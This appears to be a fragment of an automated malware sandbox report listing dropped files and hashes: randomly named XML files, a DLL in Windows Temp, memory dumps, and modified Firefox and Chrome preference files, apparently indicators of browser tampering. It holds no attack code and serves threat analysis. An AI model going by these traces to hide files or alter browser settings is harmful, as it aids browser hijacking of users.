SHA256 6d762bcfac44e939c58166e323db14ebdde87db7ed0edc65fe63305d77189496
SHA512 6ffb4b285e380085b5a3aa38071a4cc7d5de83bb1b3958c1b4bb7f0e2c2087d81da7a7690b8d11ebf3c58c2ca95d26b42bf5a037f4171680de91ac1f59dd94c1

C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\VCxgmMy.xml

MD5 b32e8ea3fc0323cdbeb9f59b46d65489
SHA1 118a9595d5171fb3879000dbe2d8703f95eae450
SHA256 86d2e38cb0231bd0bbe579d5e80b8a49918fd4bffbfc77c433b693c0f86cf6a1
SHA512 4aa562d645a91fd692ba6a8463dc3cd7ca20bbf486c58ac7bf12644265275f945d6b3896a8a270a88719943d6e90dd4c8eeb2d4eb675de6fc93ce16e392ae1c1

C:\Program Files (x86)\mVqQIGUXDOgrC\WVwqAGo.xml

MD5 0e9daca9540d7b754f940816fb812c33
SHA1 3049d43ecb4f60febceaf905ef438c48cef72667
SHA256 ad3b57cf8ce197af89ca23f3a9cac7fac1a13040b50a1baefa71b317da49cd89
SHA512 289cb00f66523707221cbdc1216e4506ed9d75218ea03257c41b00e18e05c60c156ac22371e6b4953980056ddb603dd170f0f3941b540ae9d2971c6cae92cea5

C:\Windows\Temp\IzRZTwSZebgYVSAl\gxdfbuyn\NkPjBSV.dll

MD5 fdcc0ef7b4cb82035c51f55cfece6cf1
SHA1 ee1d2e870309f5ba05e0216d3ea909c1ae9d8ee4
SHA256 7c3415f11576e09a0910da101422f044162b11607aa670452843436925d8c26b
SHA512 05d9e81255dfbd647198b4f9d13c420f3f8d56a235ebbec301d7006597bec72b4bfa0dc7e8e1f76de4e9d16b5e95a9f5c585bbdb4ce5fe98cade2872dffccf3a

memory/4920-484-0x0000000003300000-0x000000000338A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\er0iywxg.default-release\prefs.js

MD5 fd32f426f911fc34af1e4491e6270fe1
SHA1 a057c666b04b3335e46ca1b4dbbf53d4db739743
SHA256 b63b8bedb939fe820d18bf24f7dcb1dffdd6c0a94a07bd3e56e421a5ec41610d
SHA512 3ed361f0dfbfc67f3bdc0ad5e105fb1d17c3127fe25bc74359ce1bae97a05868654362f0da68f1f8c02269aa52ff6140a086f1dd1bdc695c8e83d09d9e2b9a73

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 e39efb096030f98301d6f410a185deb2
SHA1 1c27179040105d7d7f1850ba5f81552d7a8a6945
SHA256 59db8c4843bdd5262a82f0d82e8cf9b6caf95c714050e7dd0891440a154881e3
SHA512 540b5b0c05aee7658719428320508239aa220b3dc5f825232e7ae715374baee182b396a9db96de2958af4bff947040b27aa9efd678ff870d55a97540019d0ee6

memory/3544-494-0x0000000001AA0000-0x0000000002088000-memory.dmp

memory/4920-502-0x00000000034E0000-0x00000000035B5000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 7bf2a304504d2352e363cf479860d86b
SHA1 4f22f83015d67cbc37ba2b983225037ba3762438
SHA256 0f4988f21de3c050a39478cab9e4d8279dbe87ad2797f3e4b6d15045963dfabb
SHA512 d55f31bc06eee3502f63ae4083e6f88b033fb7b4c4ecabb8d1b5fa42df60db7dd5f9f259e32c2d9fd04b58ff1b988f056c308829b2675cbc5e19db8d4dc0bb64